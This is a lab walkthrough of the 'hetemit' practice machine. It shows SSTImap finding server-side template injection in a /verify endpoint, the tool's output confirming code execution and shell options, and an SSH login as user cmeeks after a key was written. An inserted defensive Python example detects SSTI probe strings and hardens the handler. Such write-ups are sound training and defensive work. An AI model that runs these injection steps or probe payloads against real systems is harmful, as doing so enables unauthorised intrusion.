SSTI
SSTI has been identified in the code parameter of the /verify endpoint in the Web server on the target port 50000
Sandbox Bypass is possible
RCE confirmed
SSTImap
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ git clone https://github.com/vladko312/sstimap ; cd sstimap
Cloning into 'sstimap'...
remote: Enumerating objects: 275, done.
remote: Counting objects: 100% (136/136), done.
remote: Compressing objects: 100% (94/94), done.
remote: Total 275 (delta 78), reused 71 (delta 42), pack-reused 139 (from 1)
Receiving objects: 100% (275/275), 167.55 KiB | 3.72 MiB/s, done.
Resolving deltas: 100% (157/157), done.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit/sstimap]
└─$ python3 -m venv myVenv ; source ./myVenv/bin/activate
┌──(myVenv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit/sstimap]
└─$ pip3 install -r requirements.txt
Using SSTImap
┌──(myVenv)─(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit/sstimap]
└─$ python3 sstimap.py -u http://$IP:50000/verify -m POST -d code
[*] Version: 1.2.3
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Loaded plugins by categories: languages: 5; generic: 3; engines: 17; legacy_engines: 2
[*] Loaded request body types: 4
[*] Scanning url: http://192.168.218.117:50000/verify
[*] Testing if Body parameter 'code' is injectable
[...REDACTED...]
[+] SSTImap identified the following injection point:
Body parameter: code
Engine: Python
Injection: *
Context: text
OS: posix-linux
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
[+] Rerun SSTImap providing one of the following options:
--interactive Run SSTImap in interactive mode to switch between exploitation modes without losing progress.
--os-shell Prompt for an interactive operating system shell.
--os-cmd Execute an operating system command.
--eval-shell Prompt for an interactive shell on the template engine base language.
--eval-cmd Evaluate code in the template engine base language.
--tpl-shell Prompt for an interactive shell on the template engine.
--tpl-cmd Inject code in the template engine.
--bind-shell PORT Connect to a shell bind to a target port.
--reverse-shell HOST PORT Send a shell back to the attacker's port.
--upload LOCAL REMOTE Upload files to the server.
--download REMOTE LOCAL Download remote files.
Confirmed
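Defender-side view of the same finding, as an added example that is not part of this write-up or of the SSTImap project: a log scan that flags template-expression syntax submitted in the `code` body parameter of POST /verify (the kind of probe SSTImap's "Testing if Body parameter 'code' is injectable" step sends), and a hardened handler that allowlist-validates the parameter instead of handing it to a template engine or an evaluator. The log-line format, the source addresses, the sample values and the expected format of a legitimate verification code are constructed assumptions; the page does not show the server-side code of the /verify endpoint.

```python
"""SSTI probe detection and input hardening for a /verify endpoint.

Added example (not from the write-up or SSTImap). Assumptions: request bodies
are available as log lines in the constructed format below, and a legitimate
verification code is short and alphanumeric (hypothetical format).
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs

# Template-expression syntax of common engines. Any of these inside a field
# that should carry a plain value is a strong indicator of an SSTI probe.
TEMPLATE_SYNTAX = re.compile(
    r"\{\{.*?\}\}"      # Jinja2 / Twig / Handlebars expressions {{ ... }}
    r"|\{%.*?%\}"       # Jinja2 / Twig statements {% ... %}
    r"|\$\{.*?\}"       # FreeMarker / Velocity / JS template literals ${ ... }
    r"|#\{.*?\}"        # Ruby / Thymeleaf-style #{ ... }
    r"|<%.*?%>"         # ERB / JSP / Mako <% ... %>
    r"|__[a-z]+__",     # Python dunder access, typical of sandbox-escape attempts
    re.IGNORECASE | re.DOTALL,
)

# Constructed log format: "<timestamp> <src_ip> <METHOD> <path> [<urlencoded body>]"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<body>.*))?$"
)

# Constructed sample traffic: one legitimate code, three probes, one unrelated request.
SAMPLE_LOG = [
    "2025-01-01T10:00:01Z 10.0.0.5 POST /verify code=K7F2QX",
    "2025-01-01T10:00:07Z 10.0.0.9 POST /verify code=%7B%7B7*7%7D%7D",
    "2025-01-01T10:00:09Z 10.0.0.9 POST /verify code=%7B%7Bconfig.__class__%7D%7D",
    "2025-01-01T10:00:12Z 10.0.0.7 POST /verify code=%24%7B7*7%7D",
    "2025-01-01T10:00:15Z 10.0.0.5 GET /healthz",
]


@dataclass(frozen=True)
class Finding:
    """One flagged parameter value, with enough context to pivot on in a SIEM."""
    timestamp: str
    src_ip: str
    param: str
    value: str


def is_ssti_probe(value: str) -> bool:
    """True if the (already URL-decoded) value contains template syntax."""
    return TEMPLATE_SYNTAX.search(value) is not None


def scan_log(lines):
    """Decode each request body and flag parameters carrying template syntax."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or not m.group("body"):
            continue  # malformed line or request without a body
        params = parse_qs(m.group("body"), keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                if is_ssti_probe(value):
                    findings.append(Finding(m.group("ts"), m.group("ip"), name, value))
    return findings


# Hypothetical expected shape of a verification code (assumption, not from the page).
CODE_FORMAT = re.compile(r"^[A-Za-z0-9]{4,16}$")
KNOWN_CODES = frozenset({"K7F2QX"})  # constructed lookup table standing in for a datastore


def validate_code(code: str) -> bool:
    """Allowlist check: only plain alphanumeric codes are acceptable."""
    return CODE_FORMAT.fullmatch(code) is not None


def handle_verify(body: str) -> dict:
    """Hardened /verify handler.

    The vulnerable pattern is to build a template (or an eval() expression) from
    the submitted value. Here the value is validated against an allowlist and then
    used only as data for a lookup; it never reaches a template engine or evaluator,
    and an invalid value is not echoed back into any rendered response.
    """
    params = parse_qs(body, keep_blank_values=True)
    code = params.get("code", [""])[0]
    if not validate_code(code):
        return {"status": 400, "verified": False, "error": "invalid code format"}
    return {"status": 200, "verified": code in KNOWN_CODES}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.src_ip} param={f.param!r} value={f.value!r}")
    print(handle_verify("code=K7F2QX"))
    print(handle_verify("code=%7B%7B7*7%7D%7D"))
```

The detection half is deliberately coarse: it trades some false positives on fields that legitimately contain braces for catching probes from every common engine, so it belongs on a parameter that should never contain markup, such as a verification code. The hardening half is the actual fix for the finding above: the `code` value is treated as data to look up, never as code or template text to render.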
Exploitation
Writing SSH key
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hetemit]
└─$ ssh cmeeks@$IP -i ~/.ssh/id_ed25519
The authenticity of host '192.168.218.117 (192.168.218.117)' can't be established.
ED25519 key fingerprint is SHA256:lncQzilVmJcYmSxhFreTweZeyaqTAiomI9pvTK0k7ac.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.218.117' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Activate the web console with: systemctl enable --now cockpit.socket
[cmeeks@hetemit ~]$ whoami
cmeeks
[cmeeks@hetemit ~]$ hostname
hetemit
[cmeeks@hetemit ~]$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.218.117 netmask 255.255.255.0 broadcast 192.168.218.255
inet6 fe80::ba64:c85e:f8db:5a09 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:9e:90:4d txqueuelen 1000 (Ethernet)
RX packets 8780971 bytes 854431488 (814.8 MiB)
RX errors 0 dropped 1053 overruns 0 frame 0
TX packets 8203205 bytes 1679879312 (1.5 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 4980 bytes 1337637 (1.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4980 bytes 1337637 (1.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established on the target system as the cmeeks user via SSH through SSTI